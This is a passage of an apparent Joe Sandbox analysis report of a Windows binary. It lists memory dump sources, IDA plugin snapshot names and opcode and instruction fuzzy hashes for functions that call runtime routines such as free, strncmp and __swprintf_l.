                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __swprintf_l
                                      • String ID: WinSSL$WinSSL
                                      • API String ID: 1488884202-1321085023
                                      • Opcode ID: 238056ff88d02ce5119fa24a2c3a9425861f6d79c7468d5c330a3d13134e9f20
                                      • Instruction ID: cabafbbb84548186ad4cfdfaac3581cc4ab88989e328fd8a4b27564663ceff15
                                      • Opcode Fuzzy Hash: 238056ff88d02ce5119fa24a2c3a9425861f6d79c7468d5c330a3d13134e9f20
                                      • Instruction Fuzzy Hash: 8FD0E2A0A48B4AD1FB05FB21B8416A1E394AF5C310FD80035C46C122E0AE3CA59DABE8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 9995d6a211b3e798ccdbd738c9d8675bc6ad194b090578f506f663e4213fe4c2
                                      • Instruction ID: ea48dcff9993aa27c3b67d6b2fe1903c2f6127c0a190365603d7a763f15339a9
                                      • Opcode Fuzzy Hash: 9995d6a211b3e798ccdbd738c9d8675bc6ad194b090578f506f663e4213fe4c2
                                      • Instruction Fuzzy Hash: B2615C76A09B4586EB14AB26F950769E3A1FF4CB84F880031DE6E07790CF3CE4599798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$strchrstrncmp
                                      • String ID:
                                      • API String ID: 2993706390-0
                                      • Opcode ID: 700cb26f2c5fb71ae8b9847a1d8b5bea32f8ca74b18bc1e335638a67898d50c7
                                      • Instruction ID: dff3865fb7a15015dc82eb87d56050f3ac6fc06b1ad921fccbad1f91232e1f66
                                      • Opcode Fuzzy Hash: 700cb26f2c5fb71ae8b9847a1d8b5bea32f8ca74b18bc1e335638a67898d50c7
                                      • Instruction Fuzzy Hash: CF318911A0D682C5FF20AB22B810079D654AF5DB90F9C8171CE6E427D1DE2CF44BA2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: d036fb8021ae91222c6f94acdca1afd0e9ae6d666ddc8fd1f663f5fb044b4c20
                                      • Instruction ID: 02fcce9e9aa41258a6c6ca3ac267b60509e96d8db6d9fc6be50bc80116a39cca
                                      • Opcode Fuzzy Hash: d036fb8021ae91222c6f94acdca1afd0e9ae6d666ddc8fd1f663f5fb044b4c20
                                      • Instruction Fuzzy Hash: F921DB26618B4593EB04AF22F954368A360FF4DB94F480171CE2E1BB90CF3CE4699798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D42040,?,?,?,00007FF7F8D2FC4C), ref: 00007FF7F8D47468
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D42040,?,?,?,00007FF7F8D2FC4C), ref: 00007FF7F8D474A3
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 00007FF7F8D474CB
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 00007FF7F8D474E6
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 7dce3c025a71e321e4df44194207822269153505a38e31d3195985eaca39c239
                                      • Instruction ID: 9df409d7b03f0e6856c92457981817b58f60829a87f6404959365a9b55ed74ff
                                      • Opcode Fuzzy Hash: 7dce3c025a71e321e4df44194207822269153505a38e31d3195985eaca39c239
                                      • Instruction Fuzzy Hash: 5C21EB26608A45D2EB04AF62F960368A320FF8CF90F4C4071CE1E0B790CF3CE4699398
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 51768b4d8de0e2a93f56d1a9511dec74265358ede943afb568bbbc92874072b8
                                      • Instruction ID: 2a9f3f6f79dd55351d2021587956e6bbafe07755b8aad416c8c00f12837a7cb9
                                      • Opcode Fuzzy Hash: 51768b4d8de0e2a93f56d1a9511dec74265358ede943afb568bbbc92874072b8
                                      • Instruction Fuzzy Hash: 2121BC26618A4593EB04AF22F954368A360FF4DF94F480171DE1E1B790CF3CE4699798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 335d3a068d52f8a9023d286bf79b6a74648618da7702932a2584bf17cb3a68fa
                                      • Instruction ID: 4ad93a606c47e577ad2b66bef816540467e924bf3ae6433db63d45deb2ec8766
                                      • Opcode Fuzzy Hash: 335d3a068d52f8a9023d286bf79b6a74648618da7702932a2584bf17cb3a68fa
                                      • Instruction Fuzzy Hash: 59211A36618A85C2E764EF26F894369F364FB48B80F884135CB9E577A0CF3CE4499794
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: a0c665d73e167c2058028689bcbc984259e28be4e076b64b006e3debd7234855
                                      • Instruction ID: 00280123eaf008c355a9c4f894fc7a56d707df496d7211a3bb9f993d5bf1c4dc
                                      • Opcode Fuzzy Hash: a0c665d73e167c2058028689bcbc984259e28be4e076b64b006e3debd7234855
                                      • Instruction Fuzzy Hash: 2211A726658A45D3EB14AF22F994369A330FF9CB84F484131DE1E07794CF3CE4699798
                                      Uniqueness

                                      Uniqueness Score: -1.00%